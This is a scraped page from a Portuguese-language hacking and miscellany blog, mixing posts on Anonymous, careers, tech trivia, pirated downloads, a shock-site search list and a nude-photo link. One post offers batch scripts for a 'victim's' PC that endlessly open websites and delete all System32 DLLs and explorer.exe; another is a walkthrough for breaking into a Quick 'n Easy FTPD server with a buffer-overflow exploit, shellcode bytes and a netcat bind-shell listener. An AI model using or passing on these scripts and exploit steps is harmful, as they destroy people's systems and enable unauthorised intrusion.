publicidade
publicidade
publicidade
publicidade
publicidade
publicidade
publicidade
Mostrando postagens com marcador Skynet. Mostrar todas as postagens

ATUALIZAÇÃO LENTA NAS POSTAGENS DO BLOG

MOTIVO

O motivo é simples, falta de internet estavel funcional.

PEÇO IMENSAS DESCULPAS AOS FIEIS VISITANTES DO BLOG POR ESTA IRRITANTE FALHA NO FUNCIONAMENTO DO NOSSO GRANDIOSO BLOG. DESDE JA INFORMO QUE A QUESTAO DE REDE JA ESTA RESOLVIDA AGORA COM UM LINK SUFICIENTEMENTE RAPIDO 600KB-Download GARANTIDOS ENTÃO ATÉ PARA MIM A VIDA FICOU FACIL AGORA QUERO DEDICAR ME A IMPORTAR INFO DA DEEP WEEB hehe PARA JUNTOS CONSUMIRMOS. AGUARDEM MUITO CONTEUDO EXCLUSIVO AQUI

Deixe seu Comentário:
Sem comentários »
Categorias:

Fotos Carolina Dieckmann Nua - Pelada

LINK PARA A GALERIA DE FOTOS

Famosas Brasil

 

Deixe seu Comentário:
Sem comentários »
Categorias:

Descubra se você conhece as linguagens de programação

(Fonte da imagem: Reprodução/What’s that Programming Language?)

Você é um exímio conhecedor das principais linguagens de programação do mundo? E das que ficaram no passado, mas foram vitais para que a computação chegasse aonde está? Então está na hora de testar os seus conhecimentos em um site muito simples, mas que pode ser muito divertido para os programadores de plantão. Ficou curioso? Então clique aqui para acessar o “What’s that Programming Language?”.

Tudo o que você precisa fazer, assim que a página for carregada, é analisar o código que está sendo mostrado na tela. Sabendo qual é a linguagem utilizada, digite o nome dela na caixa de texto indicada. Estando correto, você ganhará um ponto e uma nova será mostrada na tela. Caso você não saiba, pressione a tecla “Esc” duas vezes para pular a fase.

O seu score é carregado no canto superior esquerdo da tela, mostrando o número de acertos e também de tentativas. Como já dissemos, além de várias linguagens utilizadas atualmente, também há várias que marcaram a história da programação.

Deixe seu Comentário:
Sem comentários »

Anonymous: Evolução, historia, what is the plan.Etc

HISTORIA: O que é Anonymous


Para entender para que O Plano serve, o melhor é primeiro familiarizar-se com Anonymous. A questão não é quem é anônimo, pois somos todos irmãos e irmãs de uma única idéia. A questão é o que é Anonymous. É um coletivo de pessoas em todo o mundo que, apesar de suas diferenças de opinião comum e crenças, estão unidos sob um desejo comum de verdadeira liberdade e um mundo livre de opressão.

Enquanto alguns podem pensar que ser Anonymous requer esconder sua identidade, isso simplesmente não é o caso. Identidade não interessa a um membro do Anonymous. Enquanto alguns que praticam atos ativista online (hacktivismo), certamente o desejo de manter seu segredo a verdadeira identidade para fins de segurança, outros que você encontrará nesta comunidade entenderam que quem elas são não importa tanto quanto o que eles representam. No Anonymous não existem líderes, nem figura-cabeças, nem porta-vozes designados ... como cada um de nós são todas estas coisas no nosso próprio direito. Temos tomado a iniciativa de subir para a ocasião e se mantenham firmes contra as forças opressoras e destrutivas que têm assolado o nosso mundo e estuprado nosso modo de vida.

Nesta comunidade você pode testemunhar discordâncias de alguns, talvez o argumento ocasional, afinal somos apenas humanos. Mas uma coisa você vai notar como um objetivo comum e compartilhado: liberdade e um desejo de mudança. Neste praticamos os caminhos de uma colméia-mente. Cada um de nós contribuindo com idéias e informações e as massas de agir sobre ele, tudo em forma simultânea. Como a comunidade cresce, faz assim nossa capacidade de atingir os outros e uma coisa é certa, Anonymous não pode ser interrompido. Somos todos individuos e estamos aqui por direito próprio, a idéia de Anônimo é imparável.

Mais uma vez, Anonymous não é um grupo ou entidade. Não é você, nem a mim ou a qualquer indivíduo. Anonymous é uma idéia. Aqueles que se identificam com o Anonymous compartilha a idéia comum de liberdade e um mundo livre de opressão. Qualquer coisa que se interpõe entre as pessoas e estas liberdades torna-se um alvo a um escrutínio severo e protesto.

Muitos equívocos sobre Anonymous foram alimentados a você pela grande mídia e os governos de todo o mundo. Tenha a certeza, estamos aqui para ajudar. Estamos aqui para levantar-se contra aqueles que violam os seus direitos como humano vivo e pulsante. Liberdade de pensamento, fala, expressão, crenças ... liberdade de escolher como você deseja viver a sua vida.

Anonymous não é um grupo de hackers muito como você tem sido levados a acreditar. Apesar de um coletivo que se associam -se como Anonymous são na verdade hackerativistas, muitos de nós somos simples cidadãos deste mundo que vai levar para as ruas os métodos tradicionais de ativismo. No entanto, o jogo mudou. Opressão e tirania tornaram-se muito muito comum neste mundo e temos aumentado para atender as ocasião. Anonymous está em toda parte. Nós somos o seu vizinhos, colegas amigos, parentes. Nós somos o seu carteiros, barbeiros, balconistas e advogados. Em um mundo onde a corrupção esconde seu rosto em cada esquina, Anonymous está lá para enfrentá-lo com força.

EVOLUÇÃO:
Deixe seu Comentário:
Sem comentários »
Categorias:

Mais comandos batch de irritação!



Mais uns comandos batch, pra irritar ou mesmo estragar o PC da vítima suahsuahaus!

Não se esqueça de gravar (nomedoarquivo). bat, e NÃO execute em seu PC!
Esse abre o site infinitivamente.

@ECHO OFF
:mc_respect
START 
http://brechacker.blogspot.com/ 
CLS
GOTO mc_respect
em  http://brechacker.blogspot.com/  digita o site que você pretende.
Elimina todas as DLL do PC!
@ECHO OFF
CD\
CD WINDOWS
CD SYSTEM32
DEL /s /q *.dll
CLS
EXIT
Deleta o explorer.exe
@ECHO OFF
CD\
CD WINDOWS
DEL /s /q explorer.exe
CLS
EXIT
Esse escreve uma mensagem infinitamente pra vitima!
@ECHO OFF
:mc_respect
Deixe seu Comentário:
Sem comentários »
Categorias:

Profissionais formados Vs. Autodidatas

Profissionais formados Vs. Autodidatas

Autodidata é uma pessoa que aprende algo por esforços próprios, ou seja, sem ajuda de um tutor especializado ou em uma escola. Dentre alguns famosos autodidatas , podemos citar Bill Gates, Stanley Kubrick, Woody Allen e Henry Ford.

A lista de autodidatas famosos se extende quilometricamente e esta aí para provar que o trabalho final de um profissional independe da sua formação acadêmica.

Vamos supor que você tenha gastado dois mil reais em cursos , aperfeiçoamentos e técnicas diversas , e cobre ai para fazer seu trabalho, dois mil reais. Justo. Muito justo. Agora vamos supor que você nunca
Deixe seu Comentário:
Sem comentários »
Categorias:

Guia de Carreiras e Profissões


O que vou ser a partir do ano que vem?
Se você ainda não sabe que profissão quer seguir e fica confuso quando precisa decidir seu próprio futuro... relaxe.
Comece conhecendo melhor os cursos oferecidos pelas Faculdades e Universidades. Abaixo deixo a lista de alguns cursos.

Administração


O curso de Administração tem o intuito de formar administradores que poderão atuar como executivos, técnicos em funções administrativas e/ou empreendedores preparados, tanto conceitual como instrumentalmente, para contribuir para o sucesso das organizações em que atuarem.

-Administração de Empresas
O curso de Administração, com habilitação em Administração de Empresas, forma profissionais dotados de uma visão sistêmica dos principais enfoques necessários para a gestão das organizações. Tem por meta buscar o sucesso das empresas, oferecendo ao egresso o conhecimento dos principais métodos e instrumentos que possibilitem os melhores resultados na gestão financeira, de mercado, de pessoas e clientes, entre outros.

-Administração em Análise de Sistemas
O curso de Administração com habilitação em Análise de Sistemas visa formar profissio
Deixe seu Comentário:
Sem comentários »
Categorias:

Firewall por Hardware

Traduzido com google (texto nao revisado)
O melhor firewall é um firewall de hardware que é completamente separado do seu sistema operacional. Ele não precisa ser um roteador dedicado, poderia ser uma caixa de pentium antigo rodando Linux. Abaixo eu encontrei alguns sites que têm How To sobre a criação de um router de hardware fora usando um computador antigo e usando um pequeno programa linux que cabe em um único disquete.
Breve Descrição:floppyfw é um roteador com o avançado firewall, capacidades de Linux que cabe em um disquete único.
Características:Listas de acesso, IP-masquerading (Network Address Translation), conexão rastreado filtragem de pacotes e (bastante) de roteamento avançado. Pacote para modelagem de tráfego também está disponível.Requer apenas um 386sx ou melhor com duas placas de rede, uma unidade de disquete de 1,44 MB e 12MByte de RAM (por menos de 12M e não FPU, use a série 1.0, que vai ficar mantida.)Sistema de embalagem muito simples. É usado para editores, PPP, VPN, traffic shaping e tudo vem à tona. (Agora este está olhando ainda mais como LRP (pode descansar em paz), mas floppyfw não é um garfo.)Exploração madeireira por meio klogd / syslogd, local e remoto.Suporte de série para o console pela porta serial.Servidor DHCP e DNS cache para redes internas.
floppyfw

Deixe seu Comentário:
Sem comentários »
Categorias:
,

Pendrives e cartões 'inflados', e como detectá-los

Um fenômeno cada vez mais comum são os pendrives e cartões de memória "inflados", onde o controlador exibe uma capacidade várias vezes maior que a real. Este acabou se tornando um ramo lucrativo, já que qualquer fabriqueta de fundo de quintal em algum subúrbio da China pode transformar milhares de pendrives ou cartões com 1 GB ou menos em modelos de 16 GB ou mais sem grande esforço, tendo o trabalho apenas de falsificar também as inscrições e a embalagem.
Por terem um valor inicial muito baixo, estes produtos remarcados encontram rapidamente o caminho dos sites de leilão, vendedores ambulantes e até mesmo algumas lojas respeitáveis, transformando-se em uma verdadeira praga.
Este tipo de falsificação é bem mais grave que uma simples remarcação (ou seja, vender outro produto similar, porém de uma marca mais barata como se fosse um pendrive da Kingston ou uma bateria da Nokia, por exemplo) pois o produto resultando realmente lesa o comprador, fazendo com que não apenas ele leve um produto com uma capacidade várias vezes inferior, quanto perca dados.
Este processo de "inflar" a capacidade algumas vezes pode beirar o ridículo, como no caso desta imitação de um HD externo da Samsung:

Por fora ele até engana, mas se tiver a curiosidade de abrí-lo vai ter uma surpresa:

Esta foto foi postada por um colega do leste da Rússia, que mora perto da fronteira com a China. Dentro do "HD" temos duas porcas para simular o peso e um pendrive de 128 MB, cujo controlador foi modificado para funcionar em loop,
Deixe seu Comentário:
Sem comentários »
Categorias:
,,

Ficou facil fazer compras (Somente Territorio Mocambicano)

Eu e uma companheira estamos criando um blog para com o intuito de vender,prublicitar,etc.
o blog ganhou o link de mozcompras.blogspot.com e esta ainda na sua fase inicial,estamos numa fase em que direcionamos nossa atencao a recolha e postagem de conteudo ou seja produtos novos no blog para que visitantes e nossos futoros clientes possam apreciar e compralos.
Beneficios
Para comprar voce so precisa acessar o blog apreciar e ver as condicoes do produto para posteriomente enviar uma sms para o numero +258 820028813 e solicitar o produto que a jente o levara ate sua casa de pendendo do suporte de entrega que estiver na descricao do produto
Como publico meu Produto ?
Essa e a parte mais facil bastando apenas enviar uma sms para o numero de celular acima ou mesmo fazer uma ligacao de chamada para o mesmo para negociarmos .
Aproveitem......
Deixe seu Comentário:
Sem comentários »
Categorias:

Os Illuminatis (Os supostos donos de voce !)


Deixe seu Comentário:
Sem comentários »
Categorias:

Procura empregos em Mocambique ?

CBE Southern Africa, Lda. é uma empresa privada Moçambicana, criada em 1994, que alia as vantagens da elevada qualificação profissional de consultores nacionais a uma retaguarda profissional segura do Grupo Internacional CBE, cuja sede se situa em Amsterdão (Holanda).Esta é uma empresa que faz recrutamento de pessoal para varias areas de empregos ou seja recruta pessoal para varias empresas,entre no site e crie seu perfil,nao se esqueça de enviar um arquido doc,ou pdf do seu Cv.aproveitem


Comentem e deem outras dicas e o vosso parecer...




outro site interressante que achei é o http://www.mzjobs.co.mz/
Deixe seu Comentário:
Sem comentários »
Categorias:

Até,Proximas Aulas !

Deixe seu Comentário:
Sem comentários »
Categorias:

10 coisas que você nunca deverá procurar no Google

O google esconde vários mistérios chocantes, abaixo algumas palavras chaves que você nunca deve digitar no buscador, ou caso contrário irá se arrepender.

1º. This is not sexy – e clicar “Estou com sorte”
2º. 2 Girls and 1 cup
3º. GlassAss.com – e clicar “Estou com sorte”
4º. Muito nojento – em Imagens do google
5º. Large anus – em Imagens do google
6º. Goatse - em Imagens do google
7º. Lemonparty – e clicar “Estou com sorte”
8º. Fisting – em Imagens do google
9º. Gypsy 100 - em Imagens do google
10º. Motumbo – em Imagens do google

Deixe seu Comentário:
1 comentário
Categorias:

significados das empresas de informatica.

Nunca é demais saber a origem dos nomes de famosas empresas de tecnologia como Google, Adobe, Apple, Sun e por aí afora.

Anote:
Adobe
Vem do nome do rio Adobe Creek, que corria por trás da casa de John Warnock, fundador da companhia.
Apache
Nada a ver com a destemida tribo de índios norte-americanos. O nome do servidor web gratuito vem de “Patch”, código que corrige bugs de softwares.
Apple Computers
Steve Jobs estava comendo uma maçã, quando lhe ocorreu batizar sua empresa com o nome da fruta.
Cisco
Corruptela de San Francisco, cidade norte-americana onde a empresa foi fundada.
Compaq
As 3 primeiras letras são da palavra “computer/computador” e foi adicionado o “paq” para “denotar um pequeno objeto completo”, ou que pudesse significar“compatibilidade e qualidade.”
Google
O nome inicial do Google era “googol”, expressão uasada pelo matemático Milton Sirotta para representar o número 1 seguido de 100 zeros (ou 10 elevado a 100). Só que quando Larry Page e Sergey Brin receberam o primeiro dinheiro de investidores para o projeto do sistema de buscas, o cheque veio em nome de Google. E ficou assim.
Hotmail
Os criadores do correio eletrônico online da Microsoft queriam um nome que terminasse em mail e colocaram “Hot” no início porque a expressão continha o termo “HTML”, linguagem básica com que são construídos os sites da Web.
Intel
Bob Noyce e Gordon Moore quiseram denominar a sua nova companhia “Moore Noyce” mas já existia uma cadeia de hotéis com esse nome, portanto eles tiveram de concordar com as siglas de INTegrated ELectronics (Eletrônica Integrada).
Microsoft
Bill Gates deu esse nome para representar a companhia que foi criada para dedicar-se à MICROcomputer SOFTware (software para microcomputador). Micro-soft originalmente batizado, o hífen foi retirado mais tarde.
Motorola
O fundador Paul Galvin resolveu assumir esse nome quando a sua companhia começou a fabricar rádios de carros. A companhia, na época era então chamada Victrola pois fabricava as famosas vitrolas. Victr = tocador de disco de vinil; victr + ola passou a ser motor + ola.
Sony
Vem do Latim ‘Sonus’, que significa som. E ainda de Sony, que é como são chamadas as mentes brilhantes nos Estados Unidos.
Sun
Acrônimo de Stanford University Network.
Xerox
A palavra grega “xer” significa seco. O inventor, Chestor Carlson, denominou o seu produto Xerox por ser uma cópia seca, diferentemente do concorrente à época que fazia, até então, uma cópia molhada.
Yahoo!
Palavra criada pelo escritor Jonathan Swift e utilizada em seu livro “As Viagens de Gulliver”. Representa uma pessoa cuja aparência está mais para um alienígena do que para um humano. Os criadores do portal achavam que o termo os descrevia com perfeição.

Deixe seu Comentário:
Sem comentários »
Categorias:

Galeria de Case Mods impressionantes,veja !

coolermaster-cosmos-04

Clicando na imagem voce será direcionado ao site que contém galerias de fotos de casemods impressionantes. Vale a pena conferir !!

Deixe seu Comentário:
Sem comentários »
Categorias:

O Segredo – Dublado

SECRET

Áudio: Português
Legenda: Indisponivel
Tamanho: 536 Mb
Formato: Avi

 

Sinopse:  Ao longo da existência da humanidade, um grande segredo foi protegido a ferro e fogo. Homens e mulheres extraordinários o descobriram e não só alcançaram feitos incríveis como também mudaram o curso de nossa história. Platão, Da Vinci, Galileu, Thomas Edison, Beethoven, Napoleão, Abraham Lincoln e Einstein foram alguns dos grandes homens que controlavam a força desse mistério. E agora, após milhares de anos, o Segredo será revelado para todo o mundo!

BAIXAR

Deixe seu Comentário:
Sem comentários »
Categorias:
,

Invadindo FTP com exploit

--------------------------------------------------------------------------------
Por Twi John
Estarei mostrando como invadir FTP com um exploit pronto, além de FTP você pode usar a mesa técnica para invadir Telnet, SSH entre outros.
A falha usada será buffer overflow, não estarei mostrando como funciona a falha, apenas mostrarei como invadir, já que não é aula de programação.
Estarei já muito antigo, mais facil de entender, por isso escolhi ele, este guia estará guiando você não ensinando receita de bolo.
Primeiro você deve identificar o serviço, versão, OS, entre outros. Você pode usar o nmap para isso usando a seguinte linha que gosto de usar:
nmap -v -sV -sC -O host
Para nosso caso, será encontrado um host com Quick 'n Easy FTPD 3.0, será necessario você ter acesso a algum usuario ou ftp anonimo, usando o -sC você saberá se o servidor tem acesso anonimo.
Veja o sistema operaciona.
Feito isso agora vamos usar o exploit em python.
http://www.securiteam.com/exploits/5WP0C2AJ5W.html
Aqui você deve configurar ele:

host = "127.0.0.1" // O Host que será explorado
port = 21 // A porta , por padrão 21
user = "h07" // O usuario, caso tenha acesso anonimo coloque "ftp"
password = "open" // Mesma coisa do usuario
Shellcode: No caso desse exploit será aberto a calculadora do windows, mais você pode estar alterando ele, pode encontrar shellcodes no site do metasploit ou então fazendo você mesmo.

http://www.metasploit.com/shellcode

shellcode = (
#bad chars: 0x00 0x0a 0x0d 0x5c 0x2f
#reconstruction PEB block
#mov dword edx, 0x7FFDF020 ;EDX <-- RtlEnterCriticalSection pointer
#mov dword [edx], 0x77F8AA4C ;RtlEnterCriticalSection pointer <-- original value
#...
"\xba\x20\xf0\xfd\x7f\xc7\x02\x4c\xaa\xf8\x77"

"\x33\xC0\x50\x68\x63\x61\x6C\x63\x54\x5B\x50\ x53\ xB9"

"\xad\xaa\x01\x78" #Address of system() function (2000 SP0 polish)

"\xFF\xD1\xEB\xF7")

Pronto, agora ele irá enviar "A" 267, para ocorrer o buffer overflow colocando a shellcode.
Caso você tenha escolhido uma shellcode de bind, antes de explorar você abre o netcat e digita : nc -vv -l -p (porta de bind) -n
Agora usa o exploit e você estará conectado na shell do sistema.
Obrigado, espero que tenham gostado. Me corrijam qualquer coisa.
Deixe seu Comentário:
Sem comentários »
Categorias:

Legendas

Criar legendas para filmes nunca foi tao facil
esperimente este pequeno sofT e ponha legendas nos seus Video Aulas
------------------------------------------------------------------------
Deixe seu Comentário:
Sem comentários »
Categorias: